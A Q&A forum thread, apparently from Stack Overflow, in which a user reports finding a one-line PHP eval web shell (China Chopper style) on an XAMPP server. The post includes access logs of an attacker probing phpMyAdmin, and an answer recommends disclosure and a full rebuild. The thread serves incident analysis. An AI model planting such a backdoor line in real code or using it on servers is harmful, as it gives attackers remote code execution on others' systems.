# Security issue with phpmyadmin 4.7.4 bundled with XAMPP

Tags: php, mysql, security, phpmyadmin, xampp

Ok so I believe I have come accross a security issue with the latest release of **XAMPP (php 7.2.1)** that includes **phpmyadmin 4.7.4**

I discovered a file in my htdocs folder **wuwu11.php** that contains 1 line as follows

```
<?php @eval($_POST[h])?>
```

I looked through my access logs and found the following

```
27.155.87.26 - - [21/Jan/2018:22:04:52 -0600] "GET /phpmyadmin HTTP/1.1" 301 345 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:04:52 -0600] "GET /phpmyadmin/ HTTP/1.1" 200 13732 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:04:58 -0600] "POST /phpmyadmin/index.php?token=bb05b127303d97733437297fbadf3ec1 HTTP/1.1" 200 13191 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:04:59 -0600] "GET /phpmyadmin/index.php?token=bb05b127303d97733437297fbadf3ec1 HTTP/1.1" 200 13640 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:00 -0600] "GET /phpinfo.php HTTP/1.1" 401 1299 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:01 -0600] "GET /index.php HTTP/1.1" 401 1297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:02 -0600] "GET /dashboard/phpinfo.php HTTP/1.1" 401 1309 "-" "Mozilla/5.0 (Windows NT
6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:02 -0600] "GET /u.php?act=phpinfo HTTP/1.1" 401 1293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:03 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 368 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:05 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 9663 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:06 -0600] "POST /phpmyadmin/export.php HTTP/1.1" 500 888 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:07 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 10223 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:08 -0600] "GET /wuwu11.php HTTP/1.1" 401 1298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
```

The last line ends with the php file that appears to be uploaded through phpmyadmin/import.php

In my research I found that this is related to China Chopper Hacking Kit
The IP in these access logs maps to China, Fujian, Fuzhou

[Found <?php @eval($_POST['pass']);?> code in wordpress site](https://stackoverflow.com/questions/32672027/found-php-eval-postpass-code-in-wordpress-site)

Fortunate for me I have my root directory set to something other than the default htdocs folder in xampp, otherwise I'm guessing the attacker would have been able execute the code, do some damage and then self-remove

Wondering if anyone has seen this or has any more insight as if I'm correct and that the attacker is exploiting phpmyadmin

Answer (score 0):

In the interest of being thorough, I think it's important to point out that if you have a suspected security problem with any software program, the [responsible](https://en.wikipedia.org/wiki/Responsible_disclosure) thing to do is to report it directly and privately to the company or team that maintains the software. In this case, the phpMyAdmin team has a [web page about how to submit security concerns through email](https://www.phpmyadmin.net/security/).

Next, phpMyAdmin publishes their security announcements on their [security page](https://www.phpmyadmin.net/security/), and I do not see anything there that would allow an arbitrary file to be uploaded, particularly nothing relevant affecting your version. I think it's highly unlikely that phpMyAdmin was the attack vector here. It is interesting that the attacker tried to submit data to the import and export pages, but the status code 200 is logged regardless of whether or not they were successfully logged in, so we can't tell from this section of the logs whether they were able to do anything here. Same thing with the login request where a token was posted; if it's not a actively valid token then the login attempt is rejected, and the HTTP status code is 200 regardless. They also tried several other files including u.php and a subdirectory called 'dashboard' which seems like an attempt to exploit any of several possible vulnerabilities.

With the information that's been posted, we can't tell what vector the attackers used to upload the initial file. However, you have been compromised and need to clean up, secure the attack vector, and rebuild. I suggest a complete rebuild as you can't know what else they've been able to compromise.

Comment: The timestamp of the file wuwu11.php file was at the same time as the request for it, I also noticed that after I had removed it, it appeared again at the same exact time the following day, then after I removed phpmyadmin, the file never showed up again.